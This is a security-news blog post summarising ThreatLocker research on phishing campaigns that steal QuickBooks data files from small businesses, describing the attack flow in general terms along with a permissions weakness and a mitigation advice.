Experts Warns of Notable Increase in QuickBooks Data Files Theft Attacks

Experts Warns of Notable Increase in QuickBooks Data Files Theft Attacks

According to new research, there has been a significant increase in the theft of QuickBooks file data via social engineering techniques used to deliver malware and manipulate the accounting software. “The majority of the time, the attack includes simple malware that is often signed, making it difficult to detect using antivirus or other threat detection tools,” ThreatLocker researchers wrote in a report shared with The Hacker News today. Intuit developed and marketed QuickBooks, an accounting software kit. According to the researchers, spear-phishing attacks take the form of a PowerShell command that can run within the email.

 Another attack vector includes decoy documents sent via email messages that, when opened, run a macro to download malicious code that uploads QuickBooks files to an attacker-controlled serverBad actors have also been caught using a PowerShell command called Invoke-WebRequests on target systems to upload relevant data to the Internet without downloading advanced malware. “Regardless of whether a user is an administrator or not, a piece of malware or weaponised PowerShell will read the user’s file from the file server when they have access to the Quickbooks database,” the researchers said. Furthermore, suppose QuickBooks file permissions are set to the “All” category. In that case, an attacker can target any employee in the organisation rather than a single person with the appropriate privileges, increasing the attack surface exponentially.

That’s not everything, though. The researchers claim they discovered instances where the attackers used bait-and-switch techniques to trick consumers into making fraudulent bank transfers by posing as suppliers or partners, in addition to selling the stolen data on the dark web. ThreatLocker advises users to be wary of these attacks and suggests that file permissions not be set to the “All” category to minimise exposure. According to new research, cybercriminals have been increasingly targeting QuickBooks file data at small and midsize businesses (SMBs) in recent months.

According to ThreatLocker’s findings, the breaches begin with two forms of phishing attacks to gain access to QuickBooks databases. The attackers submit a PowerShell command that runs within the malicious email in the first attack. In the second, the attackers send an email with a Word document attached; when the recipient opens the document, a macro or connection inside it downloads a file to their computer. When the executable or PowerShell command is executed, it looks up the location of the victim’s most recently saved QuickBooks file, points to the file share or local file, and grabs the file. The attackers usually upload the stolen files to Google Cloud or Amazon Web Services as a temporary transfer point, according to Danny Jenkins, co-founder and CEO of ThreatLocker. The data is then sold on the Dark Web, where it is purchased by other cybercriminals who use it to conduct further targeted attacks on other QuickBooks databases or the victims’ customers and suppliers.

Meanwhile, according to data from Barracuda Networks, 43 % of organisations of all sizes have been victims of a spear-phishing attack in the last 12 months, and only 23% have dedicated spear-phishing defences in place. “The majority of the emails are invoices and resumes,” Jenkins of ThreatLocker explains. “We don’t have exact figures, but we do know that these types of attacks cost millions of dollars in cybercrime.” 

According to Jenkins, accounting systems are often written without protection in mind. QuickBooks has a fundamental flaw: When an administrator performs a “fix” on the QuickBooks database after a system crash, all file-share permissions can be reset, making the database available to everyone in the business. If hackers gain access to the device after a patch, they will have full access to all permissions, including those of the company’s accountant or business manager. “People always ask how the hackers gained access to all of their customer accounts,” Jenkins explains. “It’s effortless: if they have access to the QuickBooks database, they have access to all of your customers.”


To summarise, this blog is here to make you understand the QuickBooks Data Files theft attacks increasing day by day. I hope that this blog helped you and was worth a read.

Share this Link:
Call for Help & Support